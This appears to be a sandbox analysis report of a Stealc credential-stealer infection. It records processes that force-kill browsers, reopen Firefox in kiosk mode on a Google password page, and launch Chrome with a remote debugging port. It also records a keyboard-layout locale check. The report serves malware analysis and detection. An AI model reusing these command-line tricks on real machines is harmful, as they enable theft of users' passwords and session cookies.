
Show Windows behavior

Target ID:	15
Start time:	06:56:21
Start date:	14/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM msedge.exe /T
Imagebase:	0x480000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	06:56:21
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	06:56:21
Start date:	14/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM opera.exe /T
Imagebase:	0x480000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	06:56:21
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	06:56:21
Start date:	14/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM brave.exe /T
Imagebase:	0x480000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	06:56:21
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	06:56:21
Start date:	14/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	06:56:21
Start date:	14/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	06:56:21
Start date:	14/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	06:56:23
Start date:	14/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2288 -parentBuildID 20230927232528 -prefsHandle 2224 -prefMapHandle 2216 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {117609fd-4f26-4a60-a0be-f2f21ea52b9b} 4128 "\\.\pipe\gecko-crash-server-pipe.4128" 1323d16ff10 socket
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	06:56:25
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe"
Imagebase:	0x800000
File size:	1'806'336 bytes
MD5 hash:	B355C3C7B4A5F5B7549D18FE732849D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001A.00000002.3062381996.00000000008CC000.00000040.00000001.01000000.00000012.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001A.00000002.3062381996.0000000000801000.00000040.00000001.01000000.00000012.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001A.00000002.3074070661.000000000133E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001A.00000003.2570885838.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Has exited:	false

Show Windows behavior

Target ID:	27
Start time:	06:56:26
Start date:	14/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4212 -parentBuildID 20230927232528 -prefsHandle 4228 -prefMapHandle 4224 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3addc31c-4409-4228-89b4-cd724dc8ae4f} 4128 "\\.\pipe\gecko-crash-server-pipe.4128" 1324d872210 rdd
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	06:56:29
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe"
Imagebase:	0xfd0000
File size:	970'240 bytes
MD5 hash:	9BA5A9284F9E89843B0D21B2B2027B5E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	06:56:31
Start date:	14/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM firefox.exe /T
Imagebase:	0x480000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	06:56:31
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	06:56:36
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe"
Imagebase:	0xbe0000
File size:	2'794'496 bytes
MD5 hash:	77FF02A2735099E1749EDD45856697EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	06:56:37
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe"
Imagebase:	0xfd0000
File size:	970'240 bytes
MD5 hash:	9BA5A9284F9E89843B0D21B2B2027B5E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	06:56:38
Start date:	14/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	06:56:39
Start date:	14/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 --field-trial-handle=2296,i,4526499487474445861,3926510125965509157,262144 /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	06:56:40
Start date:	14/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM firefox.exe /T
Imagebase:	0x480000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	06:56:40
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	06:56:43
Start date:	14/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM chrome.exe /T
Imagebase:	0x480000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	06:56:43
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	06:56:43
Start date:	14/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM chrome.exe /T
Imagebase:	0x480000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	06:56:43
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	06:56:43
Start date:	14/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM msedge.exe /T
Imagebase:	0x480000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	06:56:43
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	06:56:43
Start date:	14/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM msedge.exe /T
Imagebase:	0x480000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	06:56:43
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	06:56:44
Start date:	14/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM opera.exe /T
Imagebase:	0x480000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	06:56:44
Start date:	14/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM opera.exe /T
Imagebase:	0x480000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	06:56:44
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	06:56:44
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	06:56:44
Start date:	14/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM brave.exe /T
Imagebase:	0x480000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	06:56:44
Start date:	14/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM brave.exe /T
Imagebase:	0x480000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	06:56:44
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	06:56:44
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	06:56:44
Start date:	14/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	06:56:44
Start date:	14/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	55
Start time:	06:56:44
Start date:	14/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	06:56:44
Start date:	14/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	06:56:45
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe"
Imagebase:	0x800000
File size:	1'806'336 bytes
MD5 hash:	B355C3C7B4A5F5B7549D18FE732849D6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000039.00000003.2782806732.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000039.00000002.3139421502.0000000000801000.00000040.00000001.01000000.00000012.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000039.00000002.3142680354.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	58
Start time:	06:56:47
Start date:	14/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2304 -parentBuildID 20230927232528 -prefsHandle 2240 -prefMapHandle 2224 -prefsLen 25416 -prefMapSize 238769 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ab10bdd4-e10f-4b35-aab2-8d4644c629cb} 8032 "\\.\pipe\gecko-crash-server-pipe.8032" 2870156eb10 socket
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	5.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	10.1%
Total number of Nodes:	495
Total number of Limit Nodes:	10

Executed Functions

Function 00ED5C83 Relevance: 20.8, APIs: 3, Strings: 8, Instructions: 1535registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(?,?,00000000,00000001,F2BD9ED6,F2BD9ED6), ref: 00ED5DCC
RegQueryValueExA.KERNEL32(F2BD9ED6,?,00000000,00000000,?,00000400,?,?,00000000,00000001,F2BD9ED6,F2BD9ED6), ref: 00ED5DFA
RegCloseKey.KERNEL32(F2BD9ED6,?,?,00000000,00000001,F2BD9ED6,F2BD9ED6), ref: 00ED5E06

Strings

Keyboard Layout\Preload, xrefs: 00ED6054
00000423, xrefs: 00ED60FA
invalid stoi argument, xrefs: 00ED7090
00000419, xrefs: 00ED6098
stoi argument out of range, xrefs: 00ED7081
VUUU, xrefs: 00ED6F41
00000422, xrefs: 00ED60C9
0000043f, xrefs: 00ED612B

Memory Dump Source

Source File: 00000000.00000002.1745261623.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.1745243125.0000000000ED0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745261623.0000000000F32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745326446.0000000000F39000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745343678.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745361860.0000000000F47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745466862.00000000010A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745485019.00000000010A4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745504305.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745504305.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745540885.00000000010C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745556893.00000000010C7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745573203.00000000010C9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745589224.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745607377.00000000010D3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745624987.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745694561.00000000010EA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745723559.00000000010EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745741736.00000000010EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745757951.00000000010EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745774148.00000000010F0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745789726.00000000010F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745986530.00000000010F2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746006754.0000000001104000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746031892.0000000001119000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746052550.000000000111B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746070041.0000000001122000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746087658.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746103198.000000000112A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746124895.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746148174.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746165849.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746182948.000000000114E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746200121.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746218114.0000000001153000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746237403.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746257527.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746280996.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746302295.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746324561.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746353330.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746370977.0000000001190000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746370977.000000000119B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746419389.00000000011C9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746439496.00000000011CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746456564.00000000011CB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746477684.00000000011CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746496265.00000000011D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746517608.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1746537891.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_file.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload$VUUU$invalid stoi argument$stoi argument out of range
API String ID: 3677997916-1112634906
Opcode ID: 9a88e28578f7c7308b403194b58ea98affb7a61c50059907b35025451411186b
Instruction ID: a6f2966a30b5cf56344f6c229620ea5b7dcb05aabeaf175209ef36fff903103c
Opcode Fuzzy Hash: 9a88e28578f7c7308b403194b58ea98affb7a61c50059907b35025451411186b
Instruction Fuzzy Hash: BBC20271A001589BEF28DF68DC85BEDB7B6EF44304F104299E419B73C2DB75AA85CB90

Function 00ED735A Relevance: 2.5, APIs: 1, Instructions: 1031
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1745261623.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.1745243125.0000000000ED0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1745261623.0000000000F32000.00000040.00000001.01000000.00000003.sdmpDownload File
